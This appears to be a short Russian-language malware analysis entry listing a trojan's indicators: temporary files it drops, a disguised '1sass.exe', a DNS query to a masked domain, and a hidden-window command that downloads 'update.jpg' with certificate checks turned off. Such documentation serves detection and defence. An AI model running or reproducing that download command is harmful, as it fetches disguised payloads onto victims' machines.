Техническая информация
- %TEMP%\newfile.tmp
- %TEMP%\zbys.tmp
- %TEMP%\sczs.log
- %TEMP%\sczss.log
- %TEMP%\sjwjm.tmp
- %APPDATA%\payerss.ini
- %TEMP%\12714475\1sass.exe
- %TEMP%\12714475\awrjyrj.exe
- <Полный путь к файлу>
- из <Полный путь к файлу> в %TEMP%\12714475\lgxlywpl.tmp
- DNS ASK in####llinks.com
- '%TEMP%\12714475\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\12714475\update.jpg
- '%TEMP%\12714475\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\12714475\update.jpg' (со скрытым окном)